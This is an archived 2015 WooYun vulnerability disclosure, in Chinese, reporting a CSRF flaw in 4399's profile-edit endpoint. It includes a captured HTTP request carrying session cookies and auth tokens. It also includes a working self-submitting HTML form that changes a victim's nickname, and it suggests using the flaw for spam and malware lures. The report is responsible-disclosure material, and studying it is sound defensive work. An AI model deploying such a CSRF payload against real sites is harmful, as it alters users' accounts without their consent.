乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-20: 细节已通知厂商并且等待厂商处理中 2015-07-20: 厂商已经确认,细节仅向厂商公开 2015-07-30: 细节向核心白帽子及相关领域专家公开 2015-08-09: 细节向普通白帽子公开 2015-08-19: 细节向实习白帽子公开 2015-09-03: 细节向公众公开
4399小游戏CSRF漏洞可修改用户个人信息
登录-个人中心http://u.4399.com/user/info修改我的信息-抓包
POST /user/info/modify HTTP/1.1Host: u.4399.comProxy-Connection: keep-aliveContent-Length: 143Cache-Control: max-age=0Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://u.4399.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: application/x-www-form-urlencodedDNT: 1Referer: http://u.4399.com/user/info/modifyAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie: home4399=yes; USESSIONID=3f2bf9ec-bd89-4267-9c73-ac9a6c7a3f8b; ck_accname=1732343001; Puser=1732343001; Xauth=321dded1475d4658e6043b8f51783962; ptusertype=www_home.qq_login; Pnick=.ryga; Qnick= .; UC_sessionid=2015071905062098f13b01eb; Pauth=272418833|1732343001|t3ce7n18297df281f2db9a683eb29e7c|1437253627|10007|f230d9253ef40d6758bbebcd007794e7|0; Uauth=ext| .|2015719|www_home.#pay.|1437253627842|617983aa84e7438869ca16b865c414a4; _gprp_c=; Hm_lvt_e79fe6d54b06996ff433165b66607ec5=1437253581; Hm_lpvt_e79fe6d54b06996ff433165b66607ec5=1437254247dosubmit=true&nick=wooyun.org&sex=1&bir_year=0&bir_month=0&bir_day=0&local_province=&local_city=&qq=&phone=&origo_province=&origo_city=&school=
可以看到木有token之类的验证,来试下可不可以实施csrf攻击
<html> <!-- o(∩_∩)o --> <body> <form action="http://u.4399.com/user/info/modify" method="POST"> <input type="hidden" name="dosubmit" value="true" /> <input type="hidden" name="nick" value="wooyun666" /> <input type="hidden" name="sex" value="1" /> <input type="hidden" name="bir_year" value="0" /> <input type="hidden" name="bir_month" value="0" /> <input type="hidden" name="bir_day" value="0" /> <input type="hidden" name="local_province" value="" /> <input type="hidden" name="local_city" value="" /> <input type="hidden" name="qq" value="" /> <input type="hidden" name="phone" value="" /> <input type="hidden" name="origo_province" value="" /> <input type="hidden" name="origo_city" value="" /> <input type="hidden" name="school" value="" /> <input type="submit" value="Submit request" /> </form> </body> <script>document.forms[0].submit();</script></html>
打开测试
成功修改,其他信息也是可以修改的.如果用发信息或者发帖子之类的来诱惑用户点击,然后把用户名改成网址qq之类的来营销,挂马之类的,危害还是挺大的.csrf是苏醒的巨人嘛o(∩_∩)o
你们更专业
危害等级:低
漏洞Rank:2
确认时间:2015-07-20 16:25
谢谢你的关注,该情况已经交由相关部门处理。
暂无